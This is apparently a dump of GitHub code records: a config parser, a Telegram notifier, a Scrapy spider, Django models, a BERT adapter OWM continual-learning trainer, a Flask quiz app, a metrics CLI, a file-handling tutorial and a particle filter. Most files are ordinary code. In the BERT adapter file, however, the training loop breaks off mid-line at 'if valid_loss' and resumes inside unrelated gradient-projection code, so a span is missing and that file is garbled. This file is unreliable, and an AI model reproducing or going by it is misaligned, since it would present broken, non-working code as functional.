action=\"store_true\",\n )\n parser.add_argument(\n \"-ggnn_obj_time_step_num\",\n dest=\"ggnn_obj_time_step_num\",\n help=\"time step number of GGNN_obj\",\n type=int,\n default=3,\n )\n parser.add_argument(\n \"-ggnn_obj_hidden_dim\",\n dest=\"ggnn_obj_hidden_dim\",\n help=\"node hidden state dimension of GGNN_obj\",\n type=int,\n default=512,\n )\n parser.add_argument(\n \"-ggnn_obj_output_dim\",\n dest=\"ggnn_obj_output_dim\",\n help=\"node output feature dimension of GGNN_obj\",\n type=int,\n default=512,\n )\n parser.add_argument(\n \"-use_obj_knowledge\",\n dest=\"use_obj_knowledge\",\n help=\"use object cooccurrence knowledge\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-obj_knowledge\",\n dest=\"obj_knowledge\",\n help=\"Filename to load matrix of object cooccurrence knowledge\",\n type=str,\n default=\"\",\n )\n\n parser.add_argument(\n \"-use_ggnn_rel\",\n dest=\"use_ggnn_rel\",\n help=\"use GGNN_rel module\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-ggnn_rel_time_step_num\",\n dest=\"ggnn_rel_time_step_num\",\n help=\"time step number of GGNN_rel\",\n type=int,\n default=3,\n )\n parser.add_argument(\n \"-ggnn_rel_hidden_dim\",\n dest=\"ggnn_rel_hidden_dim\",\n help=\"node hidden state dimension of GGNN_rel\",\n type=int,\n default=512,\n )\n parser.add_argument(\n \"-ggnn_rel_output_dim\",\n dest=\"ggnn_rel_output_dim\",\n help=\"node output feature dimension of GGNN_rel\",\n type=int,\n default=512,\n )\n parser.add_argument(\n \"-use_rel_knowledge\",\n dest=\"use_rel_knowledge\",\n help=\"use cooccurrence knowledge of object pairs and relationships\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-rel_knowledge\",\n dest=\"rel_knowledge\",\n help=\"Filename to load matrix of cooccurrence knowledge of object pairs and relationships\",\n type=str,\n default=\"\",\n )\n\n parser.add_argument(\n \"-tb_log_dir\",\n dest=\"tb_log_dir\",\n help=\"dir to save tensorboard summaries\",\n type=str,\n default=\"\",\n )\n parser.add_argument(\n \"-save_rel_recall\",\n dest=\"save_rel_recall\",\n help=\"dir to save relationship results\",\n type=str,\n default=\"\",\n )\n\n return parser\n","repo_name":"yuweihao/KERN","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":11471,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"35"} +{"seq_id":"28286477908","text":"import requests\nfrom credentials import TELEGRAM_BOT_API_KEY, TELEGRAM_BOT_CHAT_ID\n\nclass Telegram:\n def __init__(self):\n self.bot_token = TELEGRAM_BOT_API_KEY\n self.bot_chat_id = TELEGRAM_BOT_CHAT_ID\n\n def send_message(self, message):\n send_text = 'https://api.telegram.org/bot' + self.bot_token + '/sendMessage?chat_id=' + self.bot_chat_id + '&parse_mode=Markdown&text=' + message\n\n response = requests.get(send_text)\n response.raise_for_status()\n return response.json()","repo_name":"andrerodpt/personalflightclub","sub_path":"telegram.py","file_name":"telegram.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42854840032","text":"# -*- coding: utf-8 -*-\n# python 3\n\nimport re\nfrom scrapy.linkextractors import LinkExtractor\nimport scrapy\n\nfrom spyder_utils import (print_spider_info,\n find_words_on_page)\n\n\nclass SpiderItem(scrapy.Item):\n \"\"\"Результат поиска одной страницы\"\"\"\n url = scrapy.Field()\n found_arr = scrapy.Field()\n count = scrapy.Field()\n\n\nclass Spider(scrapy.Spider):\n \"\"\"Краулер для поиска слов на страницах\"\"\"\n name = \"spider\"\n\n def __init__(self, url=\"\", word=\"\", unwanted=\"\", *args, **kwargs):\n super(Spider, self).__init__(*args, **kwargs)\n self.start_urls = [url]\n\n self.allowed_domains = re.findall(r\"https?://([^/]*\\.[\\w]{2,3})\", url) or \\\n re.findall(r\"^([^/]*\\.[\\w]{2,3})\", url)\n self.root = re.findall(r\"https?://([\\S]*)\", url) or [url]\n\n if word.find(\"|\") == -1:\n self.words = word.split(\"*\")\n self.separator = \"*\"\n else:\n self.words = word.split(\"|\")\n self.separator = \"|\"\n\n self.result_urls = set()\n self.visited_urls = set()\n\n self.unwanted = unwanted.split()\n\n print_spider_info(self.start_urls, self.allowed_domains,\n self.root, self.separator, self.words, self.unwanted)\n\n def parse(self, response):\n \"\"\" Обработка страницы\"\"\"\n url_without_scheme = re.findall(r\"https?://([\\w/.-]*)\", response.url)[0]\n\n # Чтобы урлы не повторялись\n if url_without_scheme not in self.visited_urls:\n\n self.result_urls.add(response.url.lower())\n self.visited_urls.add(url_without_scheme.lower())\n\n # Поиск нежелательных терминов на странице\n has_unwanted_word = False\n\n for unwanted_word in self.unwanted:\n iteration_results = find_words_on_page(response, unwanted_word)\n if iteration_results:\n has_unwanted_word = True\n break\n\n # Если на странице нет нежелательных терминов, то обрабатываем\n if not has_unwanted_word:\n item = SpiderItem()\n item['url'] = response.url\n # Поиск результатов\n search_results = set()\n for word in self.words:\n iteration_results = find_words_on_page(response, word)\n if len(iteration_results) == 0 and self.separator == \"*\":\n search_results.clear()\n break\n else:\n search_results.update(iteration_results)\n\n item['found_arr'] = list(search_results)\n item['count'] = len(search_results)\n yield item\n\n # Поиск урлов на странице\n link_extractor = LinkExtractor()\n extracted_urls = link_extractor.extract_links(response)\n extracted_urls = list(map(lambda link: link.url, extracted_urls))\n extracted_urls = list(filter(lambda x: x.rfind(\"#\") < x.rfind(\"/\"), extracted_urls))\n extracted_urls = list(filter(lambda x: self.allowed_domains[0] in x, extracted_urls))\n extracted_urls = list(filter(lambda x: self.root[0] in x, extracted_urls))\n extracted_urls = list(map(lambda x: x[0:x.rfind(\"?\")] if x.rfind(\"?\") > x.rfind(\"/\") else x, extracted_urls))\n\n # Чтобы не было повторов страниц с из-за регистра букв\n extracted_urls = list(map(lambda u: u.lower(),extracted_urls))\n\n # Урлы которые еще не учитывались\n diff = set(extracted_urls).difference(self.result_urls)\n # Учитываем и их\n self.result_urls.update(diff)\n # Рекурсивно по новым урлам\n for url in list(diff):\n yield response.follow(url, callback=self.parse)\n","repo_name":"ChocolateSwan/CourseWork","sub_path":"klein_scrapy_server/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71508943782","text":"from functools import update_wrapper\nfrom django.db import models\nfrom django.db.models import Q\n\n\n\nclass TimeStamped(models.Model):\n created_on = models.DateTimeField(auto_now_add=True)\n updated_on = models.DateTimeField(auto_now=True)\n\n class Meta:\n abstract = True\n\n\nclass RestaurantQuerySet(models.QuerySet): \n \"\"\"\n Custom get_query_set , based on the lookups provided\n \"\"\"\n def search(self,query):\n lookup = (Q(name__iexact=query)|\n Q(cuisines__iexact = query)|\n Q(rating__iexact = query)\n )\n\n return self.filter(lookup)\n\n\nclass RestaurantManager(models.Manager):\n def get_queryset(self):\n return RestaurantQuerySet(self.model , using = self._db)\n \n\n def search(self , query = None):\n if query is None:\n return self.get_queryset().none()\n return self.get_queryset().search(query)\n\n\n\nclass Restaurant(TimeStamped):\n CUISINE_CATEG = {\n 1 : \"caribbean\",\n 2 : \"vietnamese\",\n 3 : \"korean\", \n 4 : \"indian\"\n }\n name = models.CharField(max_length=256)\n cuisines = models.SmallIntegerField(choices=CUISINE_CATEG.items())\n avg_cost_for_two = models.DecimalField(max_digits=10, decimal_places=3)\n currency = models.CharField(max_length=50)\n has_table_booking = models.BooleanField()\n has_online_booking = models.BooleanField()\n agg_rating = models.IntegerField()\n rating_color = models.CharField(max_length=200)\n rating_text = models.CharField(max_length=200)\n votes = models.IntegerField()\n\n objects = RestaurantManager()\n class Meta:\n ordering = ['created_on']\n\n def __str__(self) -> str:\n return \"Restaurant-{name}\".format(self.name)","repo_name":"ayushbisht2001/task-backend2","sub_path":"restaurant/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1657613735","text":"import sys, time\nimport numpy as np\nimport torch\n\ndtype = torch.cuda.FloatTensor # run on GPU\nimport utils\nfrom tqdm import tqdm, trange\nfrom tqdm import tqdm, trange\nimport numpy as np\nimport torch\nfrom torch.utils.data import RandomSampler\nfrom torch.utils.data.distributed import DistributedSampler\nimport torch.distributed as dist\nfrom torch.utils.data import TensorDataset, random_split\nimport utils\nfrom seqeval.metrics import classification_report\nimport torch.nn.functional as F\nimport nlp_data_utils as data_utils\nfrom copy import deepcopy\nimport os\nimport logging\nimport glob\nimport math\nimport json\nimport random\nsys.path.append(\"./approaches/base/\")\nfrom bert_adapter_base import Appr as ApprBase\nfrom my_optimization import BertAdam\n\n########################################################################################################################\n\nclass Appr(ApprBase):\n\n\n def __init__(self,model,logger,taskcla, args=None):\n super().__init__(model=model,logger=logger,taskcla=taskcla,args=args)\n print('BERT ADAPTER OWM NCL')\n\n return\n\n\n\n def train(self,t,train,valid,num_train_steps,train_data,valid_data):\n global_step = 0\n self.model.to(self.device)\n\n param_optimizer = [(k, v) for k, v in self.model.named_parameters() if v.requires_grad==True]\n param_optimizer = [n for n in param_optimizer if 'pooler' not in n[0]]\n no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n t_total = num_train_steps\n optimizer = BertAdam(optimizer_grouped_parameters,\n lr=self.args.learning_rate,\n warmup=self.args.warmup_proportion,\n t_total=t_total)\n\n\n best_loss=np.inf\n best_model=utils.get_model(self.model)\n\n # Loop epochs\n for e in range(int(self.args.num_train_epochs)):\n # Train\n clock0=time.time()\n iter_bar = tqdm(train, desc='Train Iter (loss=X.XXX)')\n global_step=self.train_epoch(e,t,train,iter_bar, optimizer,t_total,global_step)\n clock1=time.time()\n\n train_loss,train_acc,train_f1_macro=self.eval(t,train)\n clock2=time.time()\n print('| Epoch {:3d}, time={:5.1f}ms/{:5.1f}ms | Train: loss={:.3f}, acc={:5.1f}% |'.format(e+1,\n 1000*self.train_batch_size*(clock1-clock0)/len(train),1000*self.train_batch_size*(clock2-clock1)/len(train),train_loss,100*train_acc),end='')\n\n valid_loss,valid_acc,valid_f1_macro=self.eval(t,valid)\n print(' Valid: loss={:.3f}, acc={:5.1f}% |'.format(valid_loss,100*valid_acc),end='')\n # Adapt lr\n if valid_loss N*1\n r = x[:, :, i * S: i * S + HH, j * S: j * S + WW].contiguous().view(1, -1)\n # r = r[:, range(r.shape[1] - 1, -1, -1)]\n k = torch.mm(p, torch.t(r))\n p.sub_(torch.mm(k, torch.t(k)) / (alpha + torch.mm(r, k)))\n w.grad.data = torch.mm(w.grad.data.view(F, -1), torch.t(p.data)).view_as(w)\n else:\n r = x\n k = torch.mm(p, torch.t(r))\n p.sub_(torch.mm(k, torch.t(k)) / (alpha + torch.mm(r, k)))\n w.grad.data = torch.mm(w.grad.data, torch.t(p.data))\n # Compensate embedding gradients\n for n, w in self.model.named_parameters():\n for layer_id in range(self.args.bert_num_hidden_layers):\n # if n == 'bert.encoder.layer.'+str(layer_id)+'.output.adapter_owm.c1.weight': #\n # pro_weight(self.Pc1, x_list[0], w, alpha=alpha_array[0], stride=2)\n #\n # if n == 'bert.encoder.layer.'+str(layer_id)+'.output.adapter_owm.c2.weight':\n # pro_weight(self.Pc2, x_list[1], w, alpha=alpha_array[0], stride=2)\n #\n # if n == 'bert.encoder.layer.'+str(layer_id)+'.output.adapter_owm.c3.weight':\n # pro_weight(self.Pc3, x_list[2], w, alpha=alpha_array[0], stride=2)\n\n if n == 'bert.encoder.layer.'+str(layer_id)+'.output.adapter_owm.fc1.weight':\n # print('h_list: ',len(h_list))\n pro_weight(self.P1, h_list[layer_id][0], w, alpha=alpha_array[1], cnn=False)\n\n if n == 'bert.encoder.layer.'+str(layer_id)+'.output.adapter_owm.fc2.weight':\n pro_weight(self.P2, h_list[layer_id][1], w, alpha=alpha_array[2], cnn=False)\n\n\n # Apply step\n # torch.nn.utils.clip_grad_norm(self.model.parameters(), self.clipgrad)\n lr_this_step = self.args.learning_rate * \\\n self.warmup_linear(global_step/t_total, self.args.warmup_proportion)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr_this_step\n\n optimizer.step()\n optimizer.zero_grad()\n global_step += 1\n return global_step\n\n def eval(self,t,data,test=None,trained_task=None):\n total_loss = 0\n total_acc = 0\n total_num = 0\n self.model.eval()\n target_list = []\n pred_list = []\n with torch.no_grad():\n for step, batch in enumerate(data):\n batch = [\n bat.to(self.device) if bat is not None else None for bat in batch]\n input_ids, segment_ids, input_mask, targets, _= batch\n real_b=input_ids.size(0)\n # Forward\n\n # Forward\n output_dict = self.model.forward(input_ids, segment_ids, input_mask)\n if 'dil' in self.args.scenario:\n output=output_dict['y']\n elif 'til' in self.args.scenario:\n outputs=output_dict['y']\n output = outputs[t]\n loss = self.ce(output, targets)\n _, pred = output.max(1)\n hits = (pred % 10 == targets).float()\n target_list.append(targets)\n pred_list.append(pred)\n # Log\n total_loss+=loss.data.cpu().numpy().item()*real_b\n total_acc+=hits.sum().data.cpu().numpy().item()\n total_num+=real_b\n f1=self.f1_compute_fn(y_pred=torch.cat(pred_list,0),y_true=torch.cat(target_list,0),average='macro')\n\n return total_loss / total_num, total_acc / total_num,f1\n\n","repo_name":"ZixuanKe/PyContinual","sub_path":"src/approaches/classification/bert_adapter_owm.py","file_name":"bert_adapter_owm.py","file_ext":"py","file_size_in_byte":8865,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"35"} +{"seq_id":"30488186387","text":"from flask import request, render_template\nfrom flask import jsonify\nimport random\nimport json\nfrom structlog import get_logger\nfrom app.main import main\nfrom app import csrf\nfrom app.constant import const\nfrom app.database.db_helper import db\n\n\n@main.route('/', methods=['GET', 'POST'])\ndef init():\n if request.method == 'GET':\n data = form_singles_dict()\n data.update(form_multiple_dict())\n data.update(form_determines_dict())\n data.update(form_responses_dict())\n data.update(form_assign_names_dict())\n get_logger().info(data)\n return render_template(\"main/answer.html\", **data)\n else:\n return render_template(\"main/answer.html\")\n\n\n@main.route(\"/get_singles\", methods=[\"GET\", \"POST\"])\ndef get_singles():\n data = form_singles_dict()\n return render_template(\"main/single.html\", **data)\n # if request.method is [\"GET\", \"POST\"]:\n # data = json.dumps(form_singles_dict())\n # return jsonify(json.dumps(data))\n # return jsonify({})\n\n\n@main.route(\"/get_multiples\", methods=[\"GET\", \"POST\"])\ndef get_multiples():\n data = form_multiple_dict()\n return render_template(\"main/multiple.html\", **data)\n\n\n@main.route(\"/get_determines\", methods=[\"GET\", \"POST\"])\ndef get_determines():\n data = form_determines_dict()\n return render_template(\"main/determine.html\", **data)\n\n\n@main.route(\"/get_responses\", methods=[\"GET\", \"POST\"])\ndef get_responses():\n data = form_responses_dict()\n return render_template(\"main/response.html\", **data)\n\n\n@csrf.exempt\n@main.route(\"/update_answer_result\", methods=[\"POST\"])\ndef update_answer_result():\n data = request.get_data()\n dic = json.loads(data)\n update_db_from_net(dic)\n\n return jsonify({\"status\": \"ok\"})\n\n\ndef form_singles_dict():\n topics = db.fetch_data()\n table_singles = topics[0]\n length = len(table_singles)\n\n while True:\n global rand\n rand = random.randint(1, length - 1)\n if not db.check_have_been_selected(0, rand):\n break\n\n singles = table_singles[rand]\n data = {\n \"single_topic\": singles[2],\n \"singles\": singles[3:7],\n \"single_answer\": singles[7]\n }\n return data\n\n\ndef form_multiple_dict():\n topics = db.fetch_data()\n table_singles = topics[1]\n length = len(table_singles)\n\n while True:\n global rand\n rand = random.randint(1, length - 1)\n if not db.check_have_been_selected(1, rand):\n break\n\n singles = table_singles[rand]\n data = {\n \"multiple_topic\": singles[2],\n \"multiples\": singles[3:7],\n \"multiple_answer\": singles[7]\n }\n return data\n\n\ndef form_determines_dict():\n topics = db.fetch_data()\n table_singles = topics[2]\n length = len(table_singles)\n\n while True:\n global rand\n rand = random.randint(1, length - 1)\n if not db.check_have_been_selected(2, rand):\n break\n\n singles = table_singles[rand]\n data = {\n \"determine_topic\": singles[2],\n \"determine_answer\": singles[7]\n }\n return data\n\n\ndef form_responses_dict():\n topics = db.fetch_data()\n table_singles = topics[3]\n length = len(table_singles)\n\n while True:\n global rand\n rand = random.randint(1, length - 1)\n if not db.check_have_been_selected(3, rand):\n break\n\n singles = table_singles[rand]\n data = {\n \"response_topic\": singles[2],\n \"response_answer\": singles[7]\n }\n return data\n\n\ndef form_assign_names_dict():\n names = list(const.USER_NAMES)\n data = {\n \"names\": names\n }\n return data\n\n\ndef update_db_from_net(dic):\n get_logger().info(dic)\n user = db.get_one_user(dic[\"user_name\"])\n get_logger().info(user)\n if dic[\"type\"] == \"single\":\n user.score += dic[\"score\"]\n user.single_score += dic[\"score\"]\n user.single_count += 1\n if dic[\"score\"] > 0:\n user.single_correct += 1\n elif dic[\"type\"] == \"multiple\":\n user.score += dic[\"score\"]\n user.multiple_score += dic[\"score\"]\n user.multiple_count += 1\n if dic[\"score\"] > 0:\n user.multiple_correct += 1\n elif dic[\"type\"] == \"determine\":\n user.score += dic[\"score\"]\n user.deter_score += dic[\"score\"]\n user.deter_count += 1\n if dic[\"score\"] > 0:\n user.deter_corr += 1\n else:\n dic[\"type\"] == \"response\"\n user.score += dic[\"score\"]\n user.resp_score += dic[\"score\"]\n user.resp_count += 1\n if dic[\"score\"] > 0:\n user.resp_corr += 1\n\n db.update_users(user)\n","repo_name":"FireBangBang/competition","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"48027236468","text":"import argparse\nimport urllib.request\nimport pickle\nimport numpy as np\nimport cv2\n\nfrom classifier.digit_classifier import HoG_LinearSVM_SingleDigitClassifier\nfrom detector.text_detector import DNN_EAST_TextDetector\nfrom sign_detector import detect_sign, CurtinSignDetector\n\n# CONFIGS\nMNIST_PATH = './data/mnist/' # path to mnist dataset\nCHAR74K_PATH = './data/char74k/Fnt/' # path to char74k dataset\nDIGIT_CLASSIFIER_PATH = './classifier/digit_svm.yml' # digit classifier SVM model\nDNN_EAST_MODEL_PATH = './detector/frozen_east_text_detection.pb' # text detector DNN model\n\ndef main(args):\n\n\n singleDigitClassifier = HoG_LinearSVM_SingleDigitClassifier()\n textDetector = DNN_EAST_TextDetector()\n regionDetector = cv2.MSER_create(max_variation=0.1)\n\n try:\n textDetector.load(DNN_EAST_MODEL_PATH)\n except cv2.error:\n print('Model does not exists. Run with --download_EAST_model')\n return\n \n if args.train_digit_classifier:\n #singleDigitClassifier.train_MNIST(MNIST_PATH)\n singleDigitClassifier.train_CHAR74K(CHAR74K_PATH)\n singleDigitClassifier.save(DIGIT_CLASSIFIER_PATH)\n else:\n singleDigitClassifier.load(DIGIT_CLASSIFIER_PATH)\n\n for image_path in args.images:\n try:\n image = cv2.imread(image_path)\n detector = CurtinSignDetector(singleDigitClassifier, textDetector,\n regionDetector)\n detect_sign(image, detector)\n except cv2.error as e:\n print(f'{image_path} failed due to cv2.error')\n print(e)\n \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--download_EAST_model', action='store_true',\n help='Download EAST model pb file')\n parser.add_argument('--train_digit_classifier', action='store_true',\n help='Whether to train a new classifier from scratch')\n parser.add_argument('images', type=str, nargs='+', help='input image')\n\n args = parser.parse_args()\n main(args) \n","repo_name":"Nhandos/DUYGAY","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9317507011","text":"from cmd import Cmd\nfrom pprint import pprint\n\nfrom dotenv import load_dotenv\n\nfrom four_key_metrics.constants import (\n CIRCLE_CI_PROJECTS,\n GIT_PROJECTS,\n GRAFANA_ALERTS,\n JENKINS_JOBS,\n PINGDOM_CHECK_NAMES,\n)\nfrom four_key_metrics.utilities import remove_generated_reports\nfrom four_key_metrics.presenters.lead_time_metrics import (\n CSVDataPresenter as LeadTimeCSVDataPresenter,\n JSONDataPresenter,\n)\nfrom four_key_metrics.presenters.mean_time_to_restore import (\n CSVDataPresenter as MeanTimeCSVDataPresenter,\n)\nfrom four_key_metrics.use_case_factory import UseCaseFactory\n\nload_dotenv()\n\n\nclass DisplayShell(Cmd):\n \"\"\"Command allowing specific reports to be generated through actions\"\"\"\n\n intro = \"Welcome to the key metrics shell. Type help or ?.\\n\"\n prompt = \"(type to generate report) \"\n\n def do_ltm(self, arg):\n \"\"\"Generate lead time time metrics\n\n Args:\n arg (string): outsput type defaulting to 'csv' but accepting\n 'json'\n \"\"\"\n self.do_lead_time_metrics(arg)\n\n def do_lead_time_metrics(self, arg):\n \"\"\"Generate lead time time metrics\n\n Args:\n arg (string): output type defaulting to 'csv' but accepting\n 'json',\n \"\"\"\n # TODO: Make this easier to pass and parse these values through the command line\n projects = GIT_PROJECTS\n default_output = LeadTimeCSVDataPresenter()\n data_presenter = {\n \"\": default_output,\n \"csv\": default_output,\n \"json\": JSONDataPresenter(),\n }[arg.lower()]\n UseCaseFactory().create(\"generate_lead_time_metrics\")(projects, data_presenter)\n\n def do_mtr(self, args):\n \"\"\"Generate mean time to restore metric\"\"\"\n\n self.do_mean_time_to_restore(args)\n\n def do_mean_time_to_restore(self, args):\n \"\"\"Generate mean time to restore metric\"\"\"\n\n pingdom_check_names = PINGDOM_CHECK_NAMES\n jenkins_jobs = JENKINS_JOBS\n circle_ci_projects = CIRCLE_CI_PROJECTS\n grafana_alert_names = GRAFANA_ALERTS\n\n UseCaseFactory().create(\"generate_mean_time_to_restore\")(\n pingdom_check_names,\n jenkins_jobs,\n circle_ci_projects,\n grafana_alert_names,\n MeanTimeCSVDataPresenter.create(),\n )\n\n def do_4km(self, args):\n \"\"\"Generate four key metrics\n (currently Lead Time Metrics and Mean Time To Restore only)\"\"\"\n\n self.do_four_key_metrics(args)\n\n def do_four_key_metrics(self, args):\n \"\"\"Generate four key metrics\n (currently Lead Time Metrics and Mean Time To Restore only)\"\"\"\n\n self.do_lead_time_metrics(args)\n self.do_mean_time_to_restore(args)\n\n def do_remove_reports(self, arg):\n \"\"\"Clean up generated reports by supported output types, e.g. .csv\n\n Args:\n arg (string): Defaults to '.csv' but can be overriden to support\n '.json, '.txt', '.xml' or other supported types\n \"\"\"\n fileExtension = \".csv\"\n if arg:\n fileExtension = arg\n pprint(f\"searching {fileExtension}\")\n remove_generated_reports(fileExtension)\n\n def do_close(self, line):\n \"\"\"Close or exit application\"\"\"\n return True\n\n\nif __name__ == \"__main__\":\n\n DisplayShell().cmdloop()\n","repo_name":"uktrade/four-key-metrics","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39555431258","text":"class Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n #电话号码的字母组合\n phone = {'2':'abc','3':'def','4':'ghi',\n '5':'jkl','6':'mno','7':'pqrs',\n '8':'tuv','9':'wxyz'\n }\n if len(digits) == 0:\n return []\n res = ['']\n for k in digits:\n res = [i + j for i in res for j in phone[k]]\n return res","repo_name":"1021695230/AlgorithmQIUZHAO","sub_path":"Week_03/78.py","file_name":"78.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"3353387080","text":"# f = open('./files/reading_file_example.txt')\n# print(f)\n# txt = f.read().splitlines()\n# print(type(txt))\n# print(txt)\n# f.close()\n\nwith open('./files/reading_file_example.txt') as f:\n lines = f.read().splitlines()\n print(type(lines))\n print(lines)\n\nwith open('./files/reading_file_example.txt', 'a') as f:\n f.write('\\nThis is text to be appended at end')\n\nwith open('./files/writing_file_example.txt', 'w') as f:\n f.write('This text will be written in a newly created file')\n\nimport os\n\nif(os.path.exists('./files/example.txt')):\n os.remove('./files/example.txt')\nelse:\n print('The file does not exists')\n\nimport json\n# json to dictionary\n\nperson_json = '''{\n \"name\":\"Lucas\",\n \"country\":\"Brazil\",\n \"city\":\"Macapá\",\n \"skills\":[\"Javascript\", \"React\", \"VueJs\", \"Python\"]\n}'''\n\nperson_dct = json.loads(person_json)\nprint(type(person_dct))\nprint(person_dct)\nprint(person_dct['name'])\n\n# dictionary to json\n\nperson = {\n \"name\":\"Lucas\",\n \"country\":\"Brazil\",\n \"city\":\"Macapá\",\n \"skills\":[\"Javascript\", \"React\", \"VueJs\", \"Python\"]\n}\njson_person = json.dumps(person, indent=4)\nprint(type(json_person))\nprint(json_person)\n\n# saving as json file\nwith open('./files/json_example.json', 'w') as f:\n json.dump(person, f, ensure_ascii=False, indent=4)\n\n# file with csv extension\nimport csv\nwith open('./files/csv_example.csv') as f:\n csv_reader = csv.reader(f, delimiter=',')\n line_cont = 0\n for row in csv_reader:\n if line_cont == 0:\n print(f'Coluumn names are:{\", \".join(row)}')\n line_cont += 1\n else:\n print(f'\\t {row[0]} is a teacher. He lives in {row[1]}, {row[2]}')\n line_cont += 1\n print(f'Number of lines: {line_cont}')\n","repo_name":"LucasFrts/30_days_of_python_challenge","sub_path":"day__19/file_handling..py","file_name":"file_handling..py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14966590404","text":"# collaborator: Evan Vogelbaum\n\"\"\"This file contains stubs for implementation of the unscented Kalman filter and particle filter\"\"\"\nfrom model import NonLinearKFModel\nfrom numpy.typing import ArrayLike\nimport numpy as np\nfrom scipy.stats import multivariate_normal as mn\nfrom numpy.random import multivariate_normal as rmn\n\n\nclass ParticleFilter:\n\n def __init__(self, params: NonLinearKFModel, num_particles):\n self.params = params\n \"\"\"Other initializations can go here\"\"\"\n self.field = self.params.field\n self.n = num_particles\n self.stack = []\n for _ in range(self.n):\n pos = rmn(np.zeros(2), self.params.Lambda)\n self.stack.append(np.array([pos[0], pos[1], 0, 0]))\n self.w = np.ones(self.n) / self.n\n\n def forward(self, meas):\n \n T = self.params.T\n stack = []\n for i in range(self.n):\n x,y,vx,vy = self.stack[i]\n Ex, Ey = self.field(x, y)\n chi = np.array([x + vx*T, y + vy*T, vx + Ex * T, vy + Ey * T])\n stack.append(rmn(chi, self.params.Q))\n self.stack = stack\n\n for i in range(self.n):\n self.w[i] = self.w[i] * mn.pdf(meas, mean=self.stack[i][0:2].reshape(-1), cov=self.params.R)\n self.w = self.w / np.sum(self.w)\n\n ## Define method to implement the particle filter\n def run_n_steps(self, N: int, measurements: ArrayLike) -> ArrayLike:\n \"\"\"Given N (number of steps) and a 2xN measurement, runs N steps of the KF and returns a 4 x N trajectory prediction\n\n Args:\n N ([int]): Number of steps\n measurements ([ArrayLike]): Measurement array\n\n Returns:\n ArrayLike: Trajectory\n \"\"\"\n est_trajectory = np.zeros((4, N))\n for n in range(N):\n self.forward(measurements[:, n])\n est_trajectory[:, n] = np.average(self.stack, axis=0, weights=self.w)\n # np.average(self.stack, axis=0, weights=self.w)\n\n return est_trajectory","repo_name":"ShuGe-MIT/fall22","sub_path":"nlkf.py","file_name":"nlkf.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36096419468","text":"#https://programmers.co.kr/learn/courses/30/lessons/49994?language=python3\n\nfrom collections import deque\n\narray= deque()\ngraph = [[0 for i in range(21)] for j in range(21)]\npos = [10, 10]\n\n# 상 하 좌 우\ndx1 = [-1, 1, 0, 0]\ndy1 = [0, 0, -1, 1]\n\ndx2 = [-2, 2, 0, 0]\ndy2 = [0, 0, -2, 2]\n\ndef solution(dirs):\n count = 0\n\n for i in dirs:\n array.append(i)\n \n while array:\n temp = array.popleft()\n \n if temp == \"U\":\n temp_x1 = pos[0] + dx1[0]\n temp_y1 = pos[1] + dy1[0]\n temp_x2 = pos[0] + dx2[0]\n temp_y2 = pos[1] + dy2[0]\n \n if temp_x2 < 0 or temp_x2 > 20 or temp_y2 < 0 or temp_y2 > 20:\n continue\n \n else:\n pos[0] = temp_x2\n pos[1] = temp_y2\n \n if graph[temp_x1][temp_y1] == 0 :\n graph[temp_x1][temp_y1] = 2\n \n elif temp == \"D\":\n temp_x1 = pos[0] + dx1[1]\n temp_y1 = pos[1] + dy1[1]\n temp_x2 = pos[0] + dx2[1]\n temp_y2 = pos[1] + dy2[1]\n \n if temp_x2 < 0 or temp_x2 > 20 or temp_y2 < 0 or temp_y2 > 20:\n continue\n \n else:\n pos[0] = temp_x2\n pos[1] = temp_y2\n if graph[temp_x1][temp_y1] == 0:\n graph[temp_x1][temp_y1] = 2\n \n elif temp == \"L\":\n temp_x1 = pos[0] + dx1[2]\n temp_y1 = pos[1] + dy1[2]\n temp_x2 = pos[0] + dx2[2]\n temp_y2 = pos[1] + dy2[2]\n \n if temp_x2 < 0 or temp_x2 > 20 or temp_y2 < 0 or temp_y2 > 20:\n continue\n \n else:\n pos[0] = temp_x2\n pos[1] = temp_y2\n if graph[temp_x1][temp_y1] == 0:\n graph[temp_x1][temp_y1] = 2\n \n elif temp == \"R\":\n temp_x1 = pos[0] + dx1[3]\n temp_y1 = pos[1] + dy1[3]\n temp_x2 = pos[0] + dx2[3]\n temp_y2 = pos[1] + dy2[3]\n \n if temp_x2 < 0 or temp_x2 > 20 or temp_y2 < 0 